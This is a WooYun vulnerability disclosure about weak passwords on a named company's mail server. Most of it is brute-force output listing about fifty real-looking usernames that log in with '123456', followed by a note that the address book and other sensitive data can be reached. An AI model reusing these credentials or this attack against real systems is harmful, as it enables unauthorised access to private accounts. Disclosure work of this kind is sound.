乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
RT
1、URL:
http://mail.china-sss.com:3000/
2、用户名+密码进行爆破, 存在大量弱口令, 证明可以登录
Request Payload1 Payload2 Status Error Timeout Length Comment18 hkt_zhengtingting 123456 200 false false 36533 66 changxiaona_hotel 123456 200 false false 36533 15 hkt_zhanggaowei 123456 200 false false 36529 17 hkt_zhangyanyue 123456 200 false false 36529 64 changchunspring 123456 200 false false 36529 8 hkt_dailinling 123456 200 false false 36527 10 hkt_hulongjiao 123456 200 false false 36527 16 hkt_zhangjieli 123456 200 false false 36527 7 hkt_changtian 123456 200 false false 36525 9 hkt_hahaiting 123456 200 false false 36525 13 hkt_xiaoyulin 123456 200 false false 36525 20 hyhou 123456 200 false false 36525 21 jiangjiacheng 123456 200 false false 36525 40 travel-online 123456 200 false false 36525 73 chengduspring 123456 200 false false 36525 98 guizhouspring 123456 200 false false 36525 11 hkt_sunjiayi 123456 200 false false 36523 27 qianjingying 123456 200 false false 36523 62 B2Cservice01 123456 200 false false 36523 14 hkt_yaofang 123456 200 false false 36521 28 qiaoyongjun 123456 200 false false 36521 42 wangyinchen 123456 200 false false 36521 47 zhangjunjun 123456 200 false false 36521 71 xingzhengke 123456 200 false false 36521 92 kangun_0830 123456 200 false false 36521 12 hkt_wanglu 123456 200 false false 36519 19 htk_wanglu 123456 200 false false 36519 69 2253945367 123456 200 false false 36519 90 maximilian 123456 200 false false 36519 3 caotianle 123456 200 false false 36517 22 jixiangwu 123456 200 false false 36517 23 kimxiao79 123456 200 false false 36517 26 muzhenyou 123456 200 false false 36517 53 zhiganghn 123456 200 false false 36517 55 aikohuang 123456 200 false false 36517 70 f1.alice 123456 200 false false 36515 87 geshasha 123456 200 false false 36515 88 traveljp 123456 200 false false 36515 89 event.gy 123456 200 false false 36515 102 jackyhan 123456 200 false false 36515 109 grace.hu 123456 200 false false 36515 2 baoyuyu 123456 200 false false 36513 32 shenlan 123456 200 false false 36513 68 europe9 123456 200 false false 36513 41 usvisa 123456 200 false false 36511 49 zhaolp 123456 200 false false 36511 67 utbsky 123456 200 false false 36511 86 beibei 123456 200 false false 36511 30 rain 123456 200 false false 36507
3、通讯录和敏感信息等
可以进一步爆破, 深入
已证明!
你们更专业!
危害等级:高
漏洞Rank:15
确认时间:2015-09-21 09:25
谢谢,已收到。
暂无